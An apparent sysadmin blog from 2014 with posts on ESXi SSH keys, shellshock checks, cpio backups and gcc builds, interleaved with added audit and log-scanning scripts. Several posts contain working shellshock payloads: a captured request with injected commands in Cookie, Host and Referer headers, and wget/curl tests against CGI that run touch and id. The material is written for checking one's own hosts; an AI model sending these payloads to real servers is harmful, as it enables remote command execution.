Wednesday, October 15, 2014

esx 5 pubkeys

To allow SSH access to ESXi/ESX hosts with public/private key authentication:

1) Generate public/private keys with ssh-keygen.
Notes
These instructions generate two files in ~/.ssh: id_rsa and id_rsa.pub.
In ESXi 5.x, the ssh-keygen command is located at /usr/lib/vmware/openssh/bin.

2) On the remote host, store the public key content, id_rsa.pub, in ~/.ssh/authorized_keys.
Notes
For ESXi 5.0, the location of authorized_keys is /etc/ssh/keys-<username>/authorized_keys
More than one key can be stored in this file.
To allow root access, change PermitRootLogin no to PermitRootLogin yes in the /etc/ssh/sshd_config file.
To disable password login, ensure that ChallengeResponseAuthentication and PasswordAuthentication are set to no.

3) Reload the service:
For ESXi, run the command:
/etc/init.d/SSH restart
For ESX, run the command:
service sshd reload
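The sshd_config edits above are easy to get subtly wrong (a second PasswordAuthentication line further down is silently ignored, because sshd uses the first occurrence). This is an added audit script, not part of the original post; it assumes a POSIX sh with awk and takes the config path as an argument so it can be pointed at /etc/ssh/sshd_config or a copied file.

```shell
#!/bin/sh
# Added example, not part of the original post: audit the three sshd_config
# settings the note above changes (PermitRootLogin, PasswordAuthentication,
# ChallengeResponseAuthentication) and say whether password login is really
# off. Assumes POSIX sh and awk; the config path is an argument.

# sshd_effective FILE KEY -> the value sshd will use for KEY.
# sshd honours the FIRST uncommented occurrence of a keyword, keywords are
# case-insensitive, and Match blocks are not evaluated here (their per-user
# overrides are not reflected). Prints "default" when the keyword is absent.
sshd_effective() {
    awk -v key="$2" '
        NF == 0 || $1 ~ /^#/ { next }
        tolower($1) == "match" { exit }
        tolower($1) == tolower(key) { print tolower($2); found = 1; exit }
        END { if (!found) print "default" }
    ' "$1"
}

# sshd_password_login_disabled FILE -> exit 0 only when both
# PasswordAuthentication and ChallengeResponseAuthentication are "no".
# An absent keyword falls back to sshd's default, which is "yes" for both,
# so "default" counts as still enabled.
sshd_password_login_disabled() {
    if [ "$(sshd_effective "$1" PasswordAuthentication)" = "no" ] &&
       [ "$(sshd_effective "$1" ChallengeResponseAuthentication)" = "no" ]; then
        return 0
    fi
    return 1
}

# sshd_report FILE -> readable summary of the three settings.
sshd_report() {
    for k in PermitRootLogin PasswordAuthentication ChallengeResponseAuthentication; do
        printf '%-32s %s\n' "$k" "$(sshd_effective "$1" "$k")"
    done
    if sshd_password_login_disabled "$1"; then
        echo "password login: disabled (keys only)"
    else
        echo "password login: STILL POSSIBLE"
    fi
}

# Stand-alone run against the live config when it is readable.
if [ -r /etc/ssh/sshd_config ]; then sshd_report /etc/ssh/sshd_config; fi
```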

Monday, October 13, 2014

the shocker

sure... we have centralized everything. what we sysadmins do have are pubkeys all over the place. so how do we figure out how much of a pain patching for the many shellshock and aftershock systems that are on our networks? well crap. first is enumerate. yank the dns zone files, clean them up and feed them into:
shocking.sh
#!/bin/bash
datestamp=$(date +"%m-%d-%Y")
: > output                                  # start a fresh report each run
for ip_addr in $(cat strippedzonefile) ; do
  # skip hosts that do not answer a single ping
  ping -q -c 1 "$ip_addr" > /dev/null 2>&1 || continue
  echo " *** $ip_addr *** " >> output
  # -B: batch mode, never prompt for a password
  scp -B theshocker.sh "root@$ip_addr:/root/" >> output
  # keys only, one short attempt; -v debug output stays on stderr
  ssh -v -o ConnectTimeout=1 -o BatchMode=yes -o ConnectionAttempts=1 \
      -o PasswordAuthentication=no "root@$ip_addr" \
      /bin/bash -c /root/theshocker.sh >> output
  echo "done"
done
mail -s "shellshock and aftershock report $datestamp" you@somewhere < output
which scp's and executes theshocker.sh
#!/bin/sh
# CVE-2014-6271 (shellshock): a vulnerable bash executes the command that
# trails the function body while importing x from the environment, so
# "true" lands on stdout even though -c "" runs nothing itself.
SHELLSHOCK=$(env x='() { :;}; echo true' /bin/bash -c "" 2>/dev/null)
# CVE-2014-7169 (aftershock): the incomplete first patch leaks parser state,
# so the trailing ">\" of the function body turns "echo date" into
# ">echo date" and a file named "echo" appears in the working directory.
# That file is the indicator, so run the probe in a scratch directory.
AFTERSHOCK=""
TESTDIR=$(mktemp -d /tmp/theshocker.XXXXXX)
( cd "$TESTDIR" && env var='() { (a)=>\' /bin/bash -c "echo date" > /dev/null 2>&1 )
[ -f "$TESTDIR/echo" ] && AFTERSHOCK=yes
rm -rf "$TESTDIR"
if [ -n "$SHELLSHOCK" ]
then
  echo "cve-2014-6271 vulnerability detected - shellshock"
else
  echo "cve-2014-6271 not detected - shellshock"
fi
if [ -n "$AFTERSHOCK" ]
then
  echo "cve-2014-7169 vulnerability detected - aftershock"
else
  echo "cve-2014-7169 not detected - aftershock"
fi
which outputs to output:
*** 192.168.6.199 ***
cve-2014-6271 vulnerability detected - shellshock
cve-2014-7169 vulnerability detected - aftershock
 *** 192.168.6.20 ***
 *** 192.168.6.21 ***
you get the picture.
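The mailed output file grows to one block per host, and hosts that never answered ssh show up as a bare header with nothing under it. This added script (not part of the original post) condenses a file in that exact format into one line per host; it assumes POSIX sh and awk, and the report it runs over is constructed.

```shell
#!/bin/sh
# Added example, not part of the original post: condense the "output" file
# that shocking.sh mails (a "*** ip ***" header per host followed by the
# theshocker.sh verdict lines) into one line per host for triage.
# Assumes POSIX sh and awk; the sample report below is constructed.

# summarize_report FILE -> "ip shellshock aftershock" per host, each verdict
# being vuln, ok, or noreply (header with no verdict lines: scp/ssh failed).
summarize_report() {
    awk '
        function flush() { if (host != "") print host, ss, af }
        /^[[:space:]]*\*\*\* .* \*\*\*/ {
            flush(); host = $2; ss = "noreply"; af = "noreply"; next
        }
        /cve-2014-6271/ { ss = ($0 ~ /vulnerability detected/) ? "vuln" : "ok" }
        /cve-2014-7169/ { af = ($0 ~ /vulnerability detected/) ? "vuln" : "ok" }
        END { flush() }
    ' "$1"
}

# count_vulnerable FILE -> number of hosts flagged for at least one CVE
count_vulnerable() {
    summarize_report "$1" | awk '$2 == "vuln" || $3 == "vuln" { n++ } END { print n + 0 }'
}

# Constructed sample in the shape of the post's output file.
SAMPLE_REPORT='*** 192.168.6.199 ***
cve-2014-6271 vulnerability detected - shellshock
cve-2014-7169 vulnerability detected - aftershock
 *** 192.168.6.20 ***
 *** 192.168.6.21 ***
cve-2014-6271 not detected - shellshock
cve-2014-7169 vulnerability detected - aftershock'

# sample_report_file -> path of a temp file holding SAMPLE_REPORT
sample_report_file() {
    f=$(mktemp)
    printf '%s\n' "$SAMPLE_REPORT" > "$f"
    echo "$f"
}

# Stand-alone run: print the per-host table and the count.
report=$(sample_report_file)
summarize_report "$report"
echo "hosts still needing the bash patch: $(count_vulnerable "$report")"
rm -f "$report"
```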

zone file to happy ips

grep -E "192\.168\.(13[6-9]|14[0-2])\.[0-9]{1,3}" db.aname.zone | sort | uniq > finessed

Monday, September 29, 2014

thanks f5

GET / HTTP/1.1
Host: www.mysite.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: () { :; }; ping -c 17 10.1.1.1
Host:() { :; }; ls -la 
Referer: () { :; }; ping -c 23 10.1.1.1

Thursday, September 25, 2014

with a rusty spoon

well kids. this just sucks donkey balls. get shell and issue:
 env x='() { :;}; echo vulnerable' bash -c "echo this is a test"  
if you see vulnerable you're in a bad trip.
it gets better. say you have cgi-bin enabled and not in perl taint mode. run this:
 wget -U "() {test;}; `which touch` /tmp/VULNERABLE" http://server/cgi-bin/valid.cgi  

and better.

curl -A '() { :;}; echo Content-Type: text/html; echo; echo `/usr/bin/id`' http://yourserver/your.cgi

with a rusty spoon.
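The captured request in "thanks f5" and the cgi-bin tests above both ride on the same "() {" prefix in a request header, and combined-format web logs record two of those headers (User-Agent and Referer). This added script (not part of the original posts) pulls the offending lines and the clients behind them out of such a log; it assumes POSIX sh with grep -E and awk, and the log lines are constructed.

```shell
#!/bin/sh
# Added example, not part of the original posts: find the "() {" function
# prefix from the captured request and the cgi-bin tests above in web
# server logs. Combined-format logs record User-Agent and Referer, so the
# signature lands in those fields. Assumes POSIX sh with grep -E and awk;
# the log lines below are constructed.

# The env-function prefix: "()" then optional whitespace then "{".
SHELLSHOCK_RE='\(\)[[:space:]]*[{]'

# shellshock_hits FILE -> the log lines carrying the prefix (none is fine)
shellshock_hits() {
    grep -E "$SHELLSHOCK_RE" "$1" || true
}

# shellshock_hit_count FILE -> number of such lines
shellshock_hit_count() {
    shellshock_hits "$1" | awk 'END { print NR }'
}

# shellshock_sources FILE -> "client_ip count", one line per offending client
shellshock_sources() {
    shellshock_hits "$1" | awk '{ n[$1]++ } END { for (ip in n) print ip, n[ip] }' | sort
}

# Constructed combined-format lines: 203.0.113.9 probes via User-Agent and
# Referer; 10.0.0.5 is a normal client whose URL merely contains "()".
SAMPLE_LOG='203.0.113.9 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/valid.cgi HTTP/1.1" 200 12 "-" "() { :; }; echo probe"
10.0.0.5 - - [25/Sep/2014:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux) Firefox/32.0"
203.0.113.9 - - [25/Sep/2014:10:01:04 +0000] "GET /cgi-bin/valid.cgi HTTP/1.1" 200 12 "() {:;}; echo probe" "curl/7.30.0"
10.0.0.5 - - [25/Sep/2014:10:01:05 +0000] "GET /docs/functions() HTTP/1.1" 404 0 "-" "Mozilla/5.0"'

# sample_log_file -> path of a temp file holding SAMPLE_LOG
sample_log_file() {
    f=$(mktemp)
    printf '%s\n' "$SAMPLE_LOG" > "$f"
    echo "$f"
}

# Stand-alone run over the sample.
log=$(sample_log_file)
shellshock_sources "$log"
rm -f "$log"
```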

Wednesday, September 24, 2014

simple cpio script

rsync is fine. but seeding a directory first is better. i like to do this on local private networks with cpio because the compression and security aren't really a concern.
thus, a simple, recursive cpio script. for dumping a local directory to an nfs mount.
#!/bin/sh
echo start "$(date)" >> /var/log/cpio.log ;
find /home/ -depth -print0 | cpio -0pdumv /nfs/mount ;
echo end "$(date)" >> /var/log/cpio.log ;

Wednesday, September 17, 2014

install gcc notes

1) Get the desired version from SVN, e.g. from svn://gcc.gnu.org/svn/gcc/tags/gcc_3_4_6_release
(To install SVN, see how to Work with SVN) 

2) Check to make sure the install-sh, config.sub and config.guess files are present in your gcc directory. If not, copy them into your unzipped gcc directory:

me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/install-sh .
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/config.sub .
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/config.guess .

3) Sample config for SUSE 10 Linux, x86_64

me@there:~/tools/gcc> mkdir objdir
me@there:~/tools/gcc> cd objdir
me@there:~/tools/gcc/objdir> ../configure --enable-threads=posix --prefix=/usr --with-local-prefix=/usr/local \
            --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib64 --libexecdir=/usr/lib64 \
            --enable-languages=c,c++,objc,fortran,java,ada --enable-checking=release --with-gxx-include-dir=/usr/include/c++/4.1.0 \
            --enable-ssp --disable-libssp --enable-java-awt=gtk --enable-gtk-cairo --disable-libjava-multilib --with-slibdir=/lib64 \
            --with-system-zlib --enable-shared --enable-__cxa_atexit --enable-libstdcxx-allocator=new --without-system-libunwind \
            --with-cpu=generic --host=x86_64-suse-linux
Instructions on how to install GCC can be found here: http://gcc.gnu.org/install/

or...

1) Search for an rpm package for your specific OS, e.g.:

http://rpm.pbone.net/index.php3/stat/3/srodzaj/1/search/gcc34

2) You can make a symbolic link to the newly installed gcc in /usr/bin